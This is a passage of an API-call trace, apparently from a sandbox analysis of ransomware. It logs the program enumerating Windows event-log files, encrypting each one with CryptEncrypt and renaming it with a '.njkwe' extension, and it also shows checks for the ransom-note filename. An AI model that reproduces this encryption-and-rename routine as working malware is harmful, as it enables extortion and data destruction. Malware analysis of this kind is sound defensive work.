lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.916] GetProcessHeap () returned 0xbe0000 [0066.916] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.916] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.916] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.916] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.916] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.916] CloseHandle (hObject=0x428) returned 1 [0066.918] GetProcessHeap () returned 0xbe0000 [0066.918] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.918] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx_r00t_{3sXlE5}.njkwe") returned 77 [0066.918] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.919] GetProcessHeap () returned 0xbe0000 [0066.919] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.919] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0066.919] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="Windows") returned -1 [0066.919] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.919] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.919] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="Program Files") returned -1 [0066.919] lstrcmpiW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.919] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 69 [0066.919] StrStrIW (lpFirst="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.919] lstrcmpW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.919] lstrcmpW (lpString1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpString2="taridd") returned -1 [0066.919] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.919] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.920] GetTickCount () returned 0x11511fe [0066.920] GetTickCount () returned 0x11511fe [0066.920] GetTickCount () returned 0x11511fe [0066.920] GetTickCount () returned 0x11511fe [0066.920] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.920] GetProcessHeap () returned 0xbe0000 [0066.920] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.920] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.922] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.922] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.922] GetProcessHeap () returned 0xbe0000 [0066.922] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.922] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.922] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.922] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.922] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.923] CloseHandle (hObject=0x428) returned 1 [0066.925] GetProcessHeap () returned 0xbe0000 [0066.925] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.925] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 89 [0066.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.925] GetProcessHeap () returned 0xbe0000 [0066.925] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.925] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0066.925] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="Windows") returned -1 [0066.925] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.925] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.925] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="Program Files") returned -1 [0066.925] lstrcmpiW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.925] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 54 [0066.925] StrStrIW (lpFirst="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.925] lstrcmpW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.925] lstrcmpW (lpString1="Microsoft-Windows-Wcmsvc%4Operational.evtx", lpString2="taridd") returned -1 [0066.925] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.926] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.926] GetTickCount () returned 0x11511fe [0066.926] GetTickCount () returned 0x11511fe [0066.926] GetTickCount () returned 0x11511fe [0066.926] GetTickCount () returned 0x11511fe [0066.926] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.926] GetProcessHeap () returned 0xbe0000 [0066.926] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.926] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.928] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.928] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.928] GetProcessHeap () returned 0xbe0000 [0066.928] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.928] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.928] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.928] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.929] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.929] CloseHandle (hObject=0x428) returned 1 [0066.931] GetProcessHeap () returned 0xbe0000 [0066.931] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.931] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 74 [0066.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.935] GetProcessHeap () returned 0xbe0000 [0066.935] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.935] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0066.935] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="Windows") returned -1 [0066.935] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.935] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.935] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="Program Files") returned -1 [0066.935] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.935] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 64 [0066.935] StrStrIW (lpFirst="Microsoft-Windows-Windows Defender%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.935] lstrcmpW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.935] lstrcmpW (lpString1="Microsoft-Windows-Windows Defender%4Operational.evtx", lpString2="taridd") returned -1 [0066.935] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.935] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.935] GetTickCount () returned 0x115120d [0066.935] GetTickCount () returned 0x115120d [0066.935] GetTickCount () returned 0x115120d [0066.935] GetTickCount () returned 0x115120d [0066.936] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.936] GetProcessHeap () returned 0xbe0000 [0066.936] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.936] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.938] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.938] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.938] GetProcessHeap () returned 0xbe0000 [0066.938] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.938] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.938] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.938] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.938] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.939] CloseHandle (hObject=0x428) returned 1 [0066.950] GetProcessHeap () returned 0xbe0000 [0066.950] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.950] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 84 [0066.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.951] GetProcessHeap () returned 0xbe0000 [0066.951] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.951] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0066.951] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="Windows") returned -1 [0066.951] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="$Recycle.bin") returned 1 [0066.951] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="System Volume Information") returned -1 [0066.951] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="Program Files") returned -1 [0066.951] lstrcmpiW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="Program Files (x86)") returned -1 [0066.951] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 56 [0066.951] StrStrIW (lpFirst="Microsoft-Windows-Windows Defender%4WHC.evtx", lpSrch=".njkwe") returned 0x0 [0066.951] lstrcmpW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.951] lstrcmpW (lpString1="Microsoft-Windows-Windows Defender%4WHC.evtx", lpString2="taridd") returned -1 [0066.951] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.951] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.951] GetTickCount () returned 0x115121d [0066.951] GetTickCount () returned 0x115121d [0066.952] GetTickCount () returned 0x115121d [0066.952] GetTickCount () returned 0x115121d [0066.952] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.952] GetProcessHeap () returned 0xbe0000 [0066.952] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.952] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.954] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.954] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.954] GetProcessHeap () returned 0xbe0000 [0066.954] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.954] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.954] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.954] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.954] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.954] CloseHandle (hObject=0x428) returned 1 [0066.956] GetProcessHeap () returned 0xbe0000 [0066.956] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.957] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx_r00t_{3sXlE5}.njkwe") returned 76 [0066.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.957] GetProcessHeap () returned 0xbe0000 [0066.957] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.957] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0066.957] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="Windows") returned -1 [0066.957] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="$Recycle.bin") returned 1 [0066.957] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="System Volume Information") returned -1 [0066.957] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="Program Files") returned -1 [0066.957] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="Program 